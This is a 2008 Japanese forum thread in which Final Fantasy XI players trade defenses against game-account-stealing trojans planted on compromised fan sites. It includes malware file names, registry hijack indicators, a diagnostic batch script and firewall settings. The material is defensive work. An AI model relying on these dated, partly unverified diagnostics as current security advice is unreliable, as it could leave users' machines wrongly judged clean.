全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50

●● RMT業者の垢ハックが多発している件36 ●●

1 名前：既にその名前は使われています：2008/08/13(水) 18:55:15 ID:MgMLTT4Y: ★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
　　・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
　　・使用ブラウザのスクリプト実行を不許可にすることをお勧めします

前スレ　●● RMT業者の垢ハックが多発している件35 ●● http://changi.2ch.net/test/read.cgi/ogame/1217834363/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を )
　　　不正アクセス専用チャットサポート = https://secure.playonline.com/support/index.html
　　　受付：月曜～金曜　11:00～19:00(土・日・祝・指定休日はお休み )
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning（垢ハックについての対策とか詳しく載ってます）　ttp://miku.xrea.jp/
FFIX Virus問題まとめサイト（初心者さん向け）　ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニに法的責任を！」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
　　別スレ　●● FF11垢ハック巻き戻し状況報告スレ ●●　http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです )
　　勇気がなくて踏めない人のための鑑定ｽﾚPart18　http://pc11.2ch.net/test/read.cgi/hack/1208760889/
2 名前：既にその名前は使われています：2008/08/13(水) 18:56:59 ID:MgMLTT4Y: ◆直近の話題◆
XREA上の一部サイトに、アカウントハックするウィルスをダウンロードさせるスクリプトが混入。
下記ページを該当時間に見た人は感染しているかどうかチェックを。

XREA　1039045744:88　の確認されたサイト

吟遊詩人テンプレ：メニュー　ヘッダー
　8月2日23時45分頃～8月7日21時40分頃
忍者スレテンプレ：メニュー　</body>と</html>の間
　？月？日？時？分頃～8月10日2時15分頃
黒魔協会：xml宣言の前
　8月7日22時23分頃～8月11日1時56分頃
FF11・マップガイド（ネット便利）フッターテーブル内
　8月9日00時00分頃～8月11日00時00分頃

参考：http://miku.xrea.jp/content5/content5_xrea2.html
3 名前：既にその名前は使われています：2008/08/13(水) 19:10:15 ID:E7JCa3jG: 平均復旧時間　一ヶ月
4 名前：既にその名前は使われています：2008/08/13(水) 19:13:39 ID:tKY7tQ/V: 壱乙であります！
xreaっていうだけで怖くて踏めないｗ
5 名前：既にその名前は使われています：2008/08/13(水) 19:38:39 ID:piVc2l2U: Adobe - サポート - Adobe Flash Player のバージョンテスト
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
6 名前：既にその名前は使われています：2008/08/13(水) 20:14:48 ID:hDANwYFp: ----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例：自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無：Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無：Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえばカスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)
7 名前：既にその名前は使われています：2008/08/13(水) 20:15:48 ID:hDANwYFp: 報告用テンプレはこっちに出しておきます
8 名前：既にその名前は使われています：2008/08/13(水) 20:17:13 ID:GBjfqCiO: 参考にする所がxreaが多いのは何故でありますか
9 名前：既にその名前は使われています：2008/08/13(水) 20:22:31 ID:+yDEIZqS: >>8
元々別のホスティングサービス使ってた
→そこが鯖管理費滞納だかで落ちた
→こりゃだめだーということでxreaに移転
→８月に入ったらxreaがやられた
10 名前：既にその名前は使われています：2008/08/13(水) 20:26:17 ID:+yDEIZqS: ■各種ソフトのアップデート報告について

スレ内を検索しやすいように各種ソフトのupdate情報のレスには符丁をつけておくことを推奨します。

・FlashPlayerなどAdobe系ソフト　・Firefoxなどブラウザ　・NoScriptなどアドオン
などの更新があったときには
　※※各種ソフトウェアアップデート情報※※

またセキュリティホールに関するニュースが出たときには
　※※セキュリティホール情報※※

を付けてみてください。
11 名前：既にその名前は使われています：2008/08/13(水) 20:26:42 ID:+yDEIZqS: ■具体的な自衛策その１(詳細は「>>1」の FF11Warningさんのところをじっくり読まれることをお勧めします)
１：ウイルススキャンソフト(ウィルス駆除ソフト)を導入する。
２：Windows UpdateでWindowsを最新の状態にする。
３：ファイアウォールを有効にする。
　　　有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
　　　ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」＞「セキュリティ」板にフリーの
　　　ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
４：PeerGuardian2(IPフィルタソフト)を導入する。
　　※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
　　　できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
　　　★PG2公式 = ttp://phoenixlabs.org/pg2/
　　　★DLページ(日本語サイト) = ttp://cowscorpion.com/Firewall/PeerGuardian.html
　　　★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
　　※設定方法はここから
　　　★リネージュ資料室　ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
　　　★PG2導入解説動画（改訂版）ニコ動　ttp://www.nicovideo.jp/watch/nm2825098
５：Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
　　それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
６：ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
　　★aguse GATEWAY = ttp://www.aguse.jp/　　★ソースチェッカーオンライン = ttp://so.7walker.net/
12 名前：既にその名前は使われています：2008/08/13(水) 20:27:08 ID:+yDEIZqS: ■具体的な自衛策その２
７：SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
　　　★Secunia公式ページ = ttps://psi.secunia.com/
　　　★SecuniaPSI RC3ダウンロードページ（日本語解説付き） = ttp://cowscorpion.com/Security/SecuniaPSI.html
８：プラグイン他、各種ソフトの更新
　　Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
　　更新と同じように更新を怠り無く。
　　　★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
　　　最新(現在は 9.0.124.0)未満の場合
　　　★Adobeアップデート　ttp://www.adobe.com/jp/downloads/updates/　で更新するか
　　　★Adobeダウンロード　ttp://www.adobe.com/jp/downloads　で最新版と入れ替えてください。
　　　※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
９：HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
　　Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
　　レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
　　問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
　　症状の発症を食い止めてくれます。
　　　★Unleak = ttp://soft3304.net/Unleak/　　★Spybot = ttp://www.spybot.info/jp/
　　　※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。
13 名前：既にその名前は使われています：2008/08/13(水) 20:27:50 ID:+yDEIZqS: ■警察への被害届け
１：まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
　　都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
２：相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
　　(この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
３：所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
４：資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
　　「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
　　家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
　　利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
　●身分証明、印鑑　　●スクエニの会社情報　　●ＨＰのプリントアウトしたもの
　●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
　●プレイオンラインのＩＤとパスワード　　●キャラ名　　●犯行時間帯
　●被害内容（なくなったゲーム内通貨・アイテム）　●プロバイダ
14 名前：既にその名前は使われています：2008/08/13(水) 20:28:20 ID:+yDEIZqS: ■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
　現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては（）内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合（）内の数値を使用すると
　設定が簡単になります。

空けているローカルポート TCP1024-65535　UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535　UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
15 名前：既にその名前は使われています：2008/08/13(水) 20:30:19 ID:+yDEIZqS: ここまで一般テンプレ

なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください

以下「wzcsvbxm.dll」に対する臨時テンプレ
（７月以降猛威をふるっているPOL干渉型のアカハクトロイです）
16 名前：既にその名前は使われています：2008/08/13(水) 20:30:57 ID:+yDEIZqS: ■「wzcsvbxm.dll」への感染に関して
感染の前兆症状(報告があったもの)　※感染していると思われるPCの症状
1：Windows Updateがフリーズする。
2：POLを起動するとエラーが出る(2回目からは正常に起動)
3：シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
4：POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
5：アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。

また、感染の確認方法として

スタートボタン(あるいはExplorerから)→「マイコンピュータ」を右クリック→メニューから「管理」を実行
→「コンピュータの管理」ウィンドウの左のツリーから「サービスとアプリケーション」→「サービス」を選択。
選択したとき、右窓の「Automatic Updates」を選んで表示される説明が「Windowsの更新のダウンロードと～」
のように日本語で表示されるかを確認。
トロイの木馬wzcsvbxm.dllは欧文の説明文を内部に持っているので、説明文が「Enables the download and ～」に
なっていたら感染の疑いありです(System32フォルダ内にwzcsvbxm.dllがいないかどうか探してください)
17 名前：既にその名前は使われています：2008/08/13(水) 20:31:26 ID:+yDEIZqS: ■「wzcsvbxm.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。

■「wzcsvbxm.dll」がPCに存在するか調べる方法(2)
コマンドプロンプト(スタート→プログラム→アクセサリにあります)を開いて、そこに
attrib %SystemRoot%\system32\wzcsvbxm.dll /s -s -h -r　←をコピペしてenter
存在しない場合 = 「ファイルが見つかりません-○:\WINDOWS\system32\wzcsvbxm.dll」(○はドライブ名)
存在する場合 = 何も表示されず次のコマンド受付状態になるので、System32フォルダを開いて探せば見つかります。

■「wzcsvbxm.dll」の検索結果について
１：wzcsvbxm.dllが「%SystemRoot%\system32」のディレクトリに見つからなければ、wzcsvbxm.dllに関しては
　　感染していません(%SystemRoot%はシステムがいるHDD上のディレクトリ表示。たとえばC:\WINDOWS)
２：wzcsvbxm.dllが「HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\」などに見つかった
　　場合、検索した履歴を保存しているだけなので放置して大丈夫です(HKEYと付くのはレジストリ)
18 名前：既にその名前は使われています：2008/08/13(水) 20:32:17 ID:+yDEIZqS: ■「wzcsvbxm.dll」がPCに存在するか調べる方法(3)
「(このレスをコピペ)」と書いてあるレスをエディタにコピペして***.bat(***の部分はなんでも○)で
保存し、保存したらExplorer上からでもダブルクリック。
※テキストエディタにワードバットなどリッチテキストで保存できるエディタの場合、リッチテキスト形式で
　ファイルを作って保存すると動きませんので、保存はテキストドキュメントで行ってください。
ダブルクリックなどで動作させたら、それが終わるまでに10秒ほどかかります。
「続行するには何かキーを押してください．．．」が出てくるまでお待ちください。
※これを実行した結果表示の★の部分になにも表示されないPC環境もあるようです。
　他の検索方法を試してwzcsvbxm.dllがPC内にいるかいないかをあわせて確認してください。
19 名前：既にその名前は使われています：2008/08/13(水) 20:34:05 ID:+yDEIZqS: @echo off && REM REG.EXE ver3.0 (このレスをコピペ)
for /L %%i in (1, 1, 9) do (reg query HKLM\SYSTEM\ControlSet00%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru %%i)
for /L %%i in (10, 1, 99) do (reg query HKLM\SYSTEM\ControlSet0%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru2 %%i)
reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
echo =========================================================================
sc qdescription wuauserv
pause
goto :EOF
:nai
exit /b -1
:aru
reg query HKLM\SYSTEM\ControlSet00%1\Services\wuauserv\Parameters
exit /b
:aru2
reg query HKLM\SYSTEM\ControlSet0%1\Services\wuauserv\Parameters
exit /b
20 名前：既にその名前は使われています：2008/08/13(水) 20:34:54 ID:+yDEIZqS: ■上記バッチファイルを実行した例(★の部分が違ってたらヤバイかも)
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll　←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll　←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll　←★
=========================================================================
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: wuauserv
DESCRIPTION : Windows　←★
続行するには何かキーを押してください．．．
21 名前：既にその名前は使われています：2008/08/13(水) 20:35:38 ID:+yDEIZqS: ■レジストリからwzcsvbxm.dllを探す方法
スタート→ファイル名を指定して実行→regedit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSetxxx（xxxは数字）\Services\wuauserv\Parametersと
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersの中の
「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認

C:\WINDOWS\system32\wuauserv.dllならそのままクローズ(この件の感染はしていない)
C:\WINDOWS\system32\wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、感染している可能性が極めて大。
まず安全な環境でパスを変更しwzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換える等の対策をする。
ただし、すぐに戻ってしまう報告もあるため修正後要確認。
本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても完全に駆除されているか分かりませんので
最終的な回答は「感染が確認された場合はクリーンインストール推奨」ということになります。

以上「wzcsvbxm.dll」に対する臨時テンプレでした。
22 名前：既にその名前は使われています：2008/08/13(水) 20:36:46 ID:uLZxbCbf: いつかテンプレに罠を仕込まれるなｗ
長すぎｗ
23 名前：既にその名前は使われています：2008/08/13(水) 20:38:36 ID:+yDEIZqS: とりあえずテンプレ貼り終了、＆注意喚起のために再掲

◆直近の話題◆
XREA上の一部サイトに、アカウントハックするウィルスをダウンロードさせるスクリプトが混入。
下記ページを該当時間に見た人は感染しているかどうかチェックを。

XREA　1039045744:88　の確認されたサイト

吟遊詩人テンプレ：メニュー　ヘッダー
　8月2日23時45分頃～8月7日21時40分頃
忍者スレテンプレ：メニュー　</body>と</html>の間
　？月？日？時？分頃～8月10日2時15分頃
黒魔協会：xml宣言の前
　8月7日22時23分頃～8月11日1時56分頃
FF11・マップガイド（ネット便利）フッターテーブル内
　8月9日00時00分頃～8月11日00時00分頃

上記ページ以外にも未確認の被害サイトが存在する可能性が高いので、
８月に入ってからWeb上で情報収集を行ったPCユーザーはチェック推奨。
24 名前：既にその名前は使われています：2008/08/13(水) 21:03:08 ID:hDANwYFp: wzcsvbxm.dllのテンプレはもう必要ないかなと思ったけど張っちゃったか
25 名前：既にその名前は使われています：2008/08/13(水) 21:03:39 ID:PVyZ6+Hy: Windowsupdateあげ
26 名前：既にその名前は使われています：2008/08/13(水) 21:07:45 ID:uPqebfMx: FF11Warning（垢ハックについての対策とか詳しく載ってます）　ttp://miku.xrea.jp/
xreaだから　不安な場合は　ミラーへttp://www.geocities.jp/ff11warning/

今回の改ざんに関するXREAのサポート掲示板
ttp://sb.xrea.com/showthread.php?t=12960
＞スクリプト経由で書き換えられている可能性が高いと思われます。
とのことで　.htaccessでphpの設定しろとのこと
ただ　今日phpのバージョンアップをしててphp4は4.4.9(EOL)に　php5は5.2.6(安定版最新）に更新されてる。
ttp://sb.xrea.com/showthread.php?s=1956ebd9e29b23e70a3a6ea137f04781&p=84507#post84507
5月以前の更新の際に設定が変わると明記されてたのに　今回の件で実は設定変えてなかったことがばれた。
27 名前：既にその名前は使われています：2008/08/13(水) 21:10:23 ID:RrnZzkBq: >>24
未だに山田オルタに感染してるアホがいるくらいだから、
いつでも古いウィルス感染する奴はいるだろう。

爺鯖のShaupuが罠ツールで涙目ｗｗロリ動画２本目
http://changi.2ch.net/test/read.cgi/ogame/1218592539/
28 名前：既にその名前は使われています：2008/08/13(水) 21:14:16 ID:K3CECdBf: >>17
んじゃついでに。
XREAで撒かれたのは「KarnaeghDrv.dll」、
これがsystem32にいたら乙。
29 名前：既にその名前は使われています：2008/08/13(水) 21:15:09 ID:hDANwYFp: XREAサイト改竄の罠については「サイトのhtmlソースを直接改変し罠サイトへの
強制アクセススクリプトを仕込む」というものなので、とりあえずブラウザの
スクリプト実行を不許可にしておけば大丈夫です
30 名前：既にその名前は使われています：2008/08/13(水) 21:25:17 ID:dDD4V9ke: >>29
揚げ足をとる様で悪いが読んだ側が思った以上に受け取ることもある
「スクリプト実行を不許可にしておけ」くらいで丁度いい
31 名前：既にその名前は使われています：2008/08/13(水) 21:30:36 ID:rN/FkYeY: POL→FFXIの切り替え時に
wmiadapt.exeってプロセスが数秒起動して消えるんだけど
これって危ない･･･？
カスペスキャンでは何もひっかからないんだけど
ググってもよくわからないし('A`)
32 名前：既にその名前は使われています：2008/08/13(水) 21:42:05 ID:hDANwYFp: >>31
これかな？

トレンドマイクロ
ttp://www.trendmicro.co.jp/Vinfo/virusencyclo/default5.asp?VName=BKDR_EMBED.W&VSect=T
33 名前：既にその名前は使われています：2008/08/13(水) 21:43:47 ID:5R2NMXn/: >>31
それだけじゃなんともいえないけど，wmiadapt.exeで動くマルウェアはあるよー．
exeファイルをウィルストータルになげて結果はってくだちい．

http://www.virustotal.com/jp/
34 名前：既にその名前は使われています：2008/08/13(水) 21:59:53 ID:rN/FkYeY: 結果のリンクを張ればいいかな？
35 名前：既にその名前は使われています：2008/08/13(水) 21:59:57 ID:0WdMGXhC: 今週の頭に垢ハックされました・・・ウィルスバスターがあると過信
していた自分にも責任があると思いますが、何だかやりきれない
感じです。一端、全スキャンをして、駆除できたと思ったのですが
ＰＣを立ち上げる度に下記のような警告が出て困っています。
どなたか、ご指導頂けると幸いです。
※ＨＤＤ初期化しか手はないのですかね。
--------------------
Hostsファイルは変更されました。
URL情報（Hostsファイル）は変更されました。ネット詐欺（ファーミング）の
可能性があります。ヒント:変更していなければ
拒否を選択してください。

127.0.0.1 へ localhost は接続します(変更)
--------------------
36 名前：既にその名前は使われています：2008/08/13(水) 22:02:17 ID:9fxH5Wrk: >>34
そうそう，結果URLはってくれればいいｗ
調べてみたけどwmiadapt.exeって正規プロセスはないしマルウェアの可能性が高いとは思うよー．
37 名前：既にその名前は使われています：2008/08/13(水) 22:03:32 ID:rN/FkYeY: こんな結果になりました

http://www.virustotal.com/jp/analisis/443e560aefd437c561909f3ad4de3ff2
38 名前：既にその名前は使われています：2008/08/13(水) 22:06:09 ID:9fxH5Wrk: >>35
KarnaeghDrv.dllの挙動としてHostｓに排他URLつっこんでる奴を一網打尽にするべくHostsファイルを消しちゃいます．
マルウェアは絶賛活動中だとは思うよ．クリンスコしたほうが絶対によろしい．
けど，原因わからないと気持ち悪いだろうしカスペルスキーのオンラインスキャンでもしてきて結果はってくれれば把握しやすいかなー．みんな．
39 名前：既にその名前は使われています：2008/08/13(水) 22:08:00 ID:9fxH5Wrk: >>37
ありがとー．どこも引っかかってないなあ．
wmiadapt.exeなんてプログラムなんかあったっけか・・・．
40 名前：既にその名前は使われています：2008/08/13(水) 22:11:53 ID:uPqebfMx: >>37
wmiadapt.exeは　パワポに汚染ファイル＞officeの脆弱性＞wmiadapt.exe＞systhin.dll生成
って　2006年時点でほとんどのベンダーがパターン認識してるから
その結果だと新種の可能性高いかも
41 名前：既にその名前は使われています：2008/08/13(水) 22:12:15 ID:hDANwYFp: >>39
新種か亜種のウィルスなのかも？
過去にその名前で実行登録するウィルスは存在してますね
42 名前：既にその名前は使われています：2008/08/13(水) 22:15:01 ID:9fxH5Wrk: >>40
そう思えるよねえ．POL＞FF起動時にプロセス動き出すってのも既存のwmiadapt.exeでは聞いたことのない挙動だし．
スタート＞プログラムを指定して実行＞RegEdit＞編集＞検索でwmiadapt.exeを検索して引っかかったところ全部書き出してほしいなー．
43 名前：既にその名前は使われています：2008/08/13(水) 22:17:09 ID:RfphjKzw: マジでRMTでギルかったり売ってる奴むかつくわぁ
44 名前：既にその名前は使われています：2008/08/13(水) 22:18:46 ID:rN/FkYeY: >>32のトレンドマイクロのサイトでは
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\shell の値を変更されるとありましたが
見つからず。

検索かけてみたところ
HKEY_LOCALMACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sources
の値が変更されてました。
XP64bitだからなんだろうか･･･とりあえずレジストリ修正してファイル消して挙動見てみます
45 名前：既にその名前は使われています：2008/08/13(水) 22:22:08 ID:K3CECdBf: 64はわからんわお手上げ
46 名前：既にその名前は使われています：2008/08/13(水) 22:27:20 ID:rN/FkYeY: レジストリ修正→削除→FF起動で
wmiadapt.exeの動きは無くなりました
とりあえずパス変えて様子を見てみようかと思います
47 名前：既にその名前は使われています：2008/08/13(水) 22:34:03 ID:G9Cd433N: 騒動が治まるまで有料鯖でもXREA使ってたら接続はよした方がいいみたいだね
La Mirageとかネトゲサイトの有名どころが使っててびびったし
48 名前：既にその名前は使われています：2008/08/13(水) 22:41:25 ID:9fxH5Wrk: うーん．WMI Performance Adapterサービスでつかうのはwmiapsrv.exeだったはずだからなー．
wmiadapt.exeがドロッパなのか，悪さする本体なのかはこの時点ではなんともいえないけどクリンスコしちゃったほうがいいよ．精神衛生上もｗ
最後まで付き合いたいが，これから家族つれて帰省せにゃならんのですまんけど後は任せた！
49 名前：既にその名前は使われています：2008/08/13(水) 22:52:30 ID:0WdMGXhC: >>38

35に書いた者ですが、カスペルスキーでスキャンしたところ以下の
感染が発見されました。

C:\WINDOWS\system32\KarnaeghDrv.dll
感染: Trojan-GameThief.Win32.OnLineGames.biuv
50 名前：既にその名前は使われています：2008/08/13(水) 22:55:08 ID:AjeLPFYd: >>49

早く削除して！！！
それある限りパス抜かれるよ！！
51 名前：既にその名前は使われています：2008/08/13(水) 22:55:11 ID:e+GDJdUw: >>49
あらあらドンピシャだ。
FFをやる上ではバスターはかなり性能はよろしくないから、この際アンインスコして
カスペの体験版とかを入れて駆除しなされ
というか一旦クリーンインスコがよさそうだなぁ
52 名前：既にその名前は使われています：2008/08/13(水) 22:55:29 ID:gZPzSaeU: Virustotalで検査しているファイルが正規ファイルのwmiadap.exeで
みんなが話しているのはwmiadapt.exeってトロイなあたりに突っ込みは
ないわけ？
53 名前：既にその名前は使われています：2008/08/13(水) 22:59:52 ID:lkkgiYGY: >>49
カスペさんに感謝しろよ
お前もう一回パス抜かれる所だったんだから
54 名前：既にその名前は使われています：2008/08/13(水) 23:02:56 ID:xZ+Ipihk: 「FF11・マップガイド（ネット便利）」をサイトで掲載されている期間に行った覚えがあるので
このスレの検索方法で色々と検索しているのですが、その件で教えていただきたい事が、、
>>17-18
の(1)(2)では検出されませんでした、(3)はちょっとよくわからないのでやってません。
そして、>>21の「レジストリからwzcsvbxm.dllを探す方法」で
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet（数字）\Services\wuauserv\Parameters
（私の場合01と02があったので両方を見ました。)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameter

この３つのServiceDllのデータを見たところ、３つ全部が
%systemroot%\system32\wuaueng.dllとなっていました。

>>21からすると、、、C:\WINDOWS\system32\「wuauserv.dll」ではないという事は
やっぱり感染しているという事ですかね？
いちよう、昼ごろに垢ハックされる危険性があるとサイトで知ったので、
別端末でのPOLのパスワード変更して、そのままにしてあります。
55 名前：既にその名前は使われています：2008/08/13(水) 23:05:46 ID:0WdMGXhC: 49です。
みなさん、ご指摘有難う御座います。
※防衛が甘過ぎると再認識させられました。この際、ＰＣでのプレイを止め
箱にでも切り替えるか検討中です。
56 名前：既にその名前は使われています：2008/08/13(水) 23:07:19 ID:J64cwx30: >>54
それは正規ファイルだと思う

次からテンプレにwuaueng.dllを追加した方がいいかも
57 名前：既にその名前は使われています：2008/08/13(水) 23:10:14 ID:0WdMGXhC: 一つ質問です。
駆除の為、現在導入のソフトのアンインストールが必要ですが、当然ネットは
切断した後に行ったほうがいいですよね？
58 名前：既にその名前は使われています：2008/08/13(水) 23:13:42 ID:J64cwx30: >>57
ウィルスを削除したのでなければトレンドマイクロに検体提出して欲しいところ
59 名前：既にその名前は使われています：2008/08/13(水) 23:18:52 ID:K3CECdBf: >>58
送付済みっす。
Kasperskyの命名からするとXREAトロイの
(把握している中では)4世代中2世代目、
生息していたのは8日夜から11日夜まで。
初代のは対応早かったんだけどなぁ。
60 名前：既にその名前は使われています：2008/08/13(水) 23:24:28 ID:IsChCS1T: >>2に追加。仕込まれてたスクリプトの情報がないけど、同じと思われる。 XREAじゃなくても危ない模様。

Final Fantasy XI Web Portal ( http://ffxiweb■com/ )
　？月？日？時？分頃～8月11日？時？分頃

http://miara.sakura.ne.jp/ff/cgi-bin/talk/index.cgi?mode=resform&res=29373 より引用
> ■ [No.29373] 【注意】“FF11 リンク集”に罠スクリプト / 2008-08-10(日) 23:09:24 [返信|引用] 投稿者 / J
> ←のFF11リンク集でリンクされている、
> “Final Fantasy XI Web Portal”様のサイト（フッターに埋め込まれているので、おそらく全ページがアウトだと思われます）に、
> 危険なドメインに誘導すると思われるスクリプトが埋め込まれています。
> みなさまご注意を。

> ■ [No.29379] Re: / 2008-08-11(月) 02:27:40 [返信|引用] 投稿者 / じゅんたる
> こんばんは。いつもお世話になっています。
> Final Fantasy XI Web Portal管理人のじゅんたるです。
>
> 罠スクリプト確認しました。
> 対策できるまで当サイトを一時停止しました。
> 近日中には復旧できると思います。
> ご迷惑をおかけして申し訳ありませんでした。
61 名前：既にその名前は使われています：2008/08/13(水) 23:36:28 ID:hDANwYFp: 罠スクリプトそのものを見てみたいな
どんなふうに書かれてるのか
62 名前：既にその名前は使われています：2008/08/13(水) 23:40:54 ID:BZcE8L8B: >>56
そうでしたか。んでは、この件に関してはひとまず安心か。

ただ、MAPサイト土日に踏んでるとは思うんだよなぁ。どうしたものか
うーんカスペルスキースキャンでもウイルスバスターが隔離してるウィルス？以外それっぽいの見当たらないんだけども、、、
